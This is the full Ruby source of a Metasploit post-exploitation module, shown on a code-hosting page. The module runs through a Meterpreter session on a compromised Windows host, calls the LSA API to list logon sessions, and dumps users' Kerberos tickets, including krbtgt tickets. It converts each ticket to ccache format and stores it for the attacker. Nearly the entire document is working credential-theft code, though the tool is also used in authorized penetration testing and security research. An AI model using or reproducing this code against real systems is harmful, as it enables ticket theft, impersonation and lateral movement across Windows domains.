Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/kerberos_tickets.rb
22083 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rex/proto/kerberos/model/kerberos_flags'

7
require 'rex/proto/kerberos/model/ticket_flags'

8
require 'rex/proto/ms_dtyp'

9


10
class MetasploitModule < Msf::Post

11
  include Msf::Post::Process

12
  include Msf::Post::Windows::Lsa

13
  include Msf::Exploit::Remote::Kerberos::Ticket

14


15
  CURRENT_PROCESS = -1

16
  CURRENT_THREAD = -2

17


18
  # https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/ne-ntsecapi-security_logon_type

19
  SECURITY_LOGON_TYPE = {

20
    0 => 'UndefinedLogonType',

21
    2 => 'Interactive',

22
    3 => 'Network',

23
    4 => 'Batch',

24
    5 => 'Service',

25
    6 => 'Proxy',

26
    7 => 'Unlock',

27
    8 => 'NetworkCleartext',

28
    9 => 'NewCredentials',

29
    10 => 'RemoteInteractive',

30
    11 => 'CachedInteractive',

31
    12 => 'CachedRemoteInteractive',

32
    13 => 'CachedUnlock'

33
  }.freeze

34
  # https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/ne-ntsecapi-kerb_protocol_message_type

35
  KERB_RETRIEVE_ENCODED_TICKET_MESSAGE = 8

36
  KERB_QUERY_TICKET_CACHE_EX_MESSAGE = 14

37


38
  def initialize(info = {})

39
    super(

40
      update_info(

41
        info,

42
        'Name' => 'Kerberos Ticket Management',

43
        'Description' => %q{

44
          Manage kerberos tickets on a compromised host.

45
        },

46
        'License' => MSF_LICENSE,

47
        'Author' => [

48
          'Will Schroeder', # original idea/research

49
          'Spencer McIntyre'

50
        ],

51
        'References' => [

52
          [ 'URL', 'https://github.com/GhostPack/Rubeus' ],

53
          [ 'URL', 'https://github.com/wavvs/nanorobeus' ],

54
          [ 'ATT&CK', Mitre::Attack::Technique::T1003_004_LSA_SECRETS ]

55
        ],

56
        'Platform' => ['win'],

57
        'SessionTypes' => %w[meterpreter],

58
        'Actions' => [

59
          ['DUMP_TICKETS', { 'Description' => 'Dump the Kerberos tickets' }],

60
          ['ENUM_LUIDS', { 'Description' => 'Enumerate session logon LUIDs' }],

61
          ['SHOW_LUID', { 'Description' => 'Show the current LUID' }],

62
        ],

63
        'DefaultAction' => 'DUMP_TICKETS',

64
        'Notes' => {

65
          'Stability' => [CRASH_SAFE],

66
          'Reliability' => [],

67
          'SideEffects' => []

68
        },

69
        'Compat' => {

70
          'Meterpreter' => {

71
            'Commands' => %w[

72
              stdapi_net_resolve_host

73
              stdapi_railgun_api

74
              stdapi_railgun_memread

75
              stdapi_railgun_memwrite

76
            ]

77
          }

78
        }

79
      )

80
    )

81


82
    register_options([

83
      OptString.new(

84
        'LUID',

85
        [false, 'An optional logon session LUID to target'],

86
        conditions: [ 'ACTION', 'in', %w[SHOW_LUID DUMP_TICKETS]],

87
        regex: /^(0x[a-fA-F0-9]{1,16})?$/

88
      ),

89
      OptString.new(

90
        'SERVICE',

91
        [false, 'An optional service name wildcard to target (e.g. krbtgt/*)'],

92
        conditions: %w[ACTION == DUMP_TICKETS]

93
      )

94
    ])

95
  end

96


97
  def run

98
    case session.native_arch

99
    when ARCH_X64

100
      @ptr_size = 8

101
    when ARCH_X86

102
      @ptr_size = 4

103
    else

104
      fail_with(Failure::NoTarget, "This module does not support #{session.native_arch} sessions.")

105
    end

106
    @hostname_cache = {}

107
    @indent_level = 0

108


109
    send("action_#{action.name.downcase}")

110
  end

111


112
  def action_dump_tickets

113
    handle = lsa_register_logon_process

114
    luids = nil

115
    if handle

116
      if target_luid

117
        luids = [ target_luid ]

118
      else

119
        luids = lsa_enumerate_logon_sessions

120
        print_error('Failed to enumerate logon sessions.') if luids.nil?

121
      end

122
      trusted = true

123
    else

124
      handle = lsa_connect_untrusted

125
      # if we can't register a logon process then we can only act on the current LUID so skip enumeration

126
      fail_with(Failure::Unknown, 'Failed to obtain a handle to LSA.') if handle.nil?

127
      trusted = false

128
    end

129
    luids ||= [ get_current_luid ]

130


131
    print_status("LSA Handle: 0x#{handle.to_s(16).rjust(@ptr_size * 2, '0')}")

132
    auth_package = lsa_lookup_authentication_package(handle, 'kerberos')

133
    if auth_package.nil?

134
      lsa_deregister_logon_process(handle)

135
      fail_with(Failure::Unknown, 'Failed to lookup the Kerberos authentication package.')

136
    end

137


138
    luids.each do |luid|

139
      dump_for_luid(handle, auth_package, luid, null_luid: !trusted)

140
    end

141
    lsa_deregister_logon_process(handle)

142
  end

143


144
  def action_enum_luids

145
    current_luid = get_current_luid

146
    luids = lsa_enumerate_logon_sessions

147
    fail_with(Failure::Unknown, 'Failed to enumerate logon sessions.') if luids.nil?

148


149
    luids.each do |luid|

150
      logon_session_data_ptr = lsa_get_logon_session_data(luid)

151
      unless logon_session_data_ptr

152
        print_status("LogonSession LUID: #{luid}")

153
        next

154
      end

155


156
      print_logon_session_summary(logon_session_data_ptr, annotation: luid == current_luid ? '%bld(current)%clr' : '')

157
      session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)

158
    end

159
  end

160


161
  def action_show_luid

162
    current_luid = get_current_luid

163
    luid = target_luid || current_luid

164
    logon_session_data_ptr = lsa_get_logon_session_data(luid)

165
    return unless logon_session_data_ptr

166


167
    print_logon_session_summary(logon_session_data_ptr, annotation: luid == current_luid ? '%bld(current)%clr' : '')

168
    session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)

169
  end

170


171
  def dump_for_luid(handle, auth_package, luid, null_luid: false)

172
    logon_session_data_ptr = lsa_get_logon_session_data(luid)

173
    return unless logon_session_data_ptr

174


175
    print_logon_session_summary(logon_session_data_ptr)

176
    session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)

177


178
    logon_session_data_ptr.contents.logon_id.clear if null_luid

179
    query_tkt_cache_req = KERB_QUERY_TKT_CACHE_REQUEST.new(

180
      message_type: KERB_QUERY_TICKET_CACHE_EX_MESSAGE,

181
      logon_id: logon_session_data_ptr.contents.logon_id

182
    )

183
    query_tkt_cache_res_ptr = lsa_call_authentication_package(handle, auth_package, query_tkt_cache_req)

184
    if query_tkt_cache_res_ptr

185
      indented_print do

186
        dump_session_tickets(handle, auth_package, logon_session_data_ptr, query_tkt_cache_res_ptr)

187
      end

188
      session.railgun.secur32.LsaFreeReturnBuffer(query_tkt_cache_res_ptr.value)

189
    end

190
  end

191


192
  def dump_session_tickets(handle, auth_package, logon_session_data_ptr, query_tkt_cache_res_ptr)

193
    case session.native_arch

194
    when ARCH_X64

195
      query_tkt_cache_response_klass = KERB_QUERY_TKT_CACHE_RESPONSE_x64

196
      retrieve_tkt_request_klass = KERB_RETRIEVE_TKT_REQUEST_x64

197
      retrieve_tkt_response_klass = KERB_RETRIEVE_TKT_RESPONSE_x64

198
    when ARCH_X86

199
      query_tkt_cache_response_klass = KERB_QUERY_TKT_CACHE_RESPONSE_x86

200
      retrieve_tkt_request_klass = KERB_RETRIEVE_TKT_REQUEST_x86

201
      retrieve_tkt_response_klass = KERB_RETRIEVE_TKT_RESPONSE_x86

202
    end

203


204
    tkt_cache = query_tkt_cache_response_klass.read(query_tkt_cache_res_ptr.contents)

205
    tkt_cache.tickets.each_with_index do |ticket, index|

206
      server_name = read_lsa_unicode_string(ticket.server_name)

207
      if datastore['SERVICE'].present? && !File.fnmatch?(datastore['SERVICE'], server_name.split('@').first, File::FNM_CASEFOLD | File::FNM_DOTMATCH)

208
        next

209
      end

210


211
      server_name_wz = session.railgun.util.str_to_uni_z(server_name)

212
      print_status("Ticket[#{index}]")

213
      indented_print do

214
        retrieve_tkt_req = retrieve_tkt_request_klass.new(

215
          message_type: KERB_RETRIEVE_ENCODED_TICKET_MESSAGE,

216
          logon_id: logon_session_data_ptr.contents.logon_id, cache_options: 8

217
        )

218
        ptr = session.railgun.util.alloc_and_write_data(retrieve_tkt_req.to_binary_s + server_name_wz)

219
        next if ptr.nil?

220


221
        retrieve_tkt_req.target_name.len = server_name_wz.length - 2

222
        retrieve_tkt_req.target_name.maximum_len = server_name_wz.length

223
        retrieve_tkt_req.target_name.buffer = ptr + retrieve_tkt_req.num_bytes

224
        session.railgun.memwrite(ptr, retrieve_tkt_req)

225
        retrieve_tkt_res_ptr = lsa_call_authentication_package(handle, auth_package, ptr, submit_buffer_length: retrieve_tkt_req.num_bytes + server_name_wz.length)

226
        session.railgun.util.free_data(ptr)

227
        next if retrieve_tkt_res_ptr.nil?

228


229
        retrieve_tkt_res = retrieve_tkt_response_klass.read(retrieve_tkt_res_ptr.contents)

230
        if retrieve_tkt_res.ticket.encoded_ticket != 0

231
          ticket = kirbi_to_ccache(session.railgun.memread(retrieve_tkt_res.ticket.encoded_ticket, retrieve_tkt_res.ticket.encoded_ticket_size))

232
          ticket_host = ticket.credentials.first.server.components.last.snapshot

233
          ticket_host = resolve_host(ticket_host) if ticket_host

234


235
          Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(ticket.encode)

236
          Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: ticket_host)

237
          presenter = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePresenter.new(ticket)

238
          print_line(presenter.present.split("\n").map { |line| "    #{print_prefix}#{line}" }.join("\n"))

239
        end

240
        session.railgun.secur32.LsaFreeReturnBuffer(retrieve_tkt_res_ptr.value)

241
      end

242
    end

243
  end

244


245
  def target_luid

246
    return nil if datastore['LUID'].blank?

247


248
    val = datastore['LUID'].to_i(16)

249
    Rex::Proto::MsDtyp::MsDtypLuid.new(

250
      high_part: (val & 0xffffffff) >> 32,

251
      low_part: (val & 0xffffffff)

252
    )

253
  end

254


255
  def kirbi_to_ccache(input)

256
    krb_cred = Rex::Proto::Kerberos::Model::KrbCred.decode(input)

257
    Msf::Exploit::Remote::Kerberos::TicketConverter.kirbi_to_ccache(krb_cred)

258
  end

259


260
  def get_current_luid

261
    luid = get_token_statistics&.authentication_id

262
    fail_with(Failure::Unknown, 'Failed to obtain the current LUID.') unless luid

263
    luid

264
  end

265


266
  def get_token_statistics(token: nil)

267
    if token.nil?

268
      result = session.railgun.advapi32.OpenThreadToken(CURRENT_THREAD, session.railgun.const('TOKEN_QUERY'), false, @ptr_size)

269
      unless result['return']

270
        error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first

271
        unless error == ::WindowsError::Win32::ERROR_NO_TOKEN

272
          print_error("Failed to open the current thread token. OpenThreadToken failed with: #{error}")

273
          return nil

274
        end

275


276
        result = session.railgun.advapi32.OpenProcessToken(CURRENT_PROCESS, session.railgun.const('TOKEN_QUERY'), @ptr_size)

277
        unless result['return']

278
          error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first

279
          print_error("Failed to open the current process token. OpenProcessToken failed with: #{error}")

280
          return nil

281
        end

282
      end

283
      token = result['TokenHandle']

284
    end

285


286
    result = session.railgun.advapi32.GetTokenInformation(token, 10, TOKEN_STATISTICS.new.num_bytes, TOKEN_STATISTICS.new.num_bytes, @ptr_size)

287
    unless result['return']

288
      error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first

289
      print_error("Failed to obtain the token information. GetTokenInformation failed with: #{error}")

290
      return nil

291
    end

292
    TOKEN_STATISTICS.read(result['TokenInformation'])

293
  end

294


295
  def resolve_host(name)

296
    name = name.dup.downcase # normalize the case since DNS is case insensitive

297
    return @hostname_cache[name] if @hostname_cache.key?(name)

298


299
    vprint_status("Resolving hostname: #{name}")

300
    begin

301
      address = session.net.resolve.resolve_host(name)[:ip]

302
    rescue Rex::Post::Meterpreter::RequestError => e

303
      elog("Unable to resolve #{name.inspect}", error: e)

304
    end

305
    @hostname_cache[name] = address

306
  end

307


308
  def print_logon_session_summary(logon_session_data_ptr, annotation: nil)

309
    sid = '???'

310
    if datastore['VERBOSE'] && logon_session_data_ptr.contents.psid != 0

311
      # reading the SID requires 3 railgun calls so only do it in verbose mode to speed things up

312
      # reading the data directly wouldn't be much faster because SIDs are of a variable length

313
      result = session.railgun.advapi32.ConvertSidToStringSidA(logon_session_data_ptr.contents.psid.to_i, @ptr_size)

314
      if result

315
        sid = session.railgun.util.read_string(result['StringSid'])

316
        session.railgun.kernel32.LocalFree(result['StringSid'])

317
      end

318
    end

319


320
    print_status("LogonSession LUID: #{logon_session_data_ptr.contents.logon_id} #{annotation}")

321
    indented_print do

322
      print_status("User:                  #{read_lsa_unicode_string(logon_session_data_ptr.contents.logon_domain)}\\#{read_lsa_unicode_string(logon_session_data_ptr.contents.user_name)}")

323
      print_status("UserSID:               #{sid}") if datastore['VERBOSE']

324
      print_status("Session:               #{logon_session_data_ptr.contents.session}")

325
      print_status("AuthenticationPackage: #{read_lsa_unicode_string(logon_session_data_ptr.contents.authentication_package)}")

326
      print_status("LogonType:             #{SECURITY_LOGON_TYPE.fetch(logon_session_data_ptr.contents.logon_type.to_i, '???')} (#{logon_session_data_ptr.contents.logon_type.to_i})")

327
      print_status("LogonTime:             #{logon_session_data_ptr.contents.logon_time.to_datetime.localtime}")

328
      print_status("LogonServer:           #{read_lsa_unicode_string(logon_session_data_ptr.contents.logon_server)}") if datastore['VERBOSE']

329
      print_status("LogonServerDNSDomain:  #{read_lsa_unicode_string(logon_session_data_ptr.contents.dns_domain_name)}") if datastore['VERBOSE']

330
      print_status("UserPrincipalName:     #{read_lsa_unicode_string(logon_session_data_ptr.contents.upn)}") if datastore['VERBOSE']

331
    end

332
  end

333


334
  def peer

335
    nil # drop the peer prefix from messages

336
  end

337


338
  def indented_print(&block)

339
    @indent_level += 1

340
    block.call

341
  ensure

342
    @indent_level -= 1

343
  end

344


345
  def print_prefix

346
    super + (' ' * @indent_level.to_i * 2)

347
  end

348
end

349


350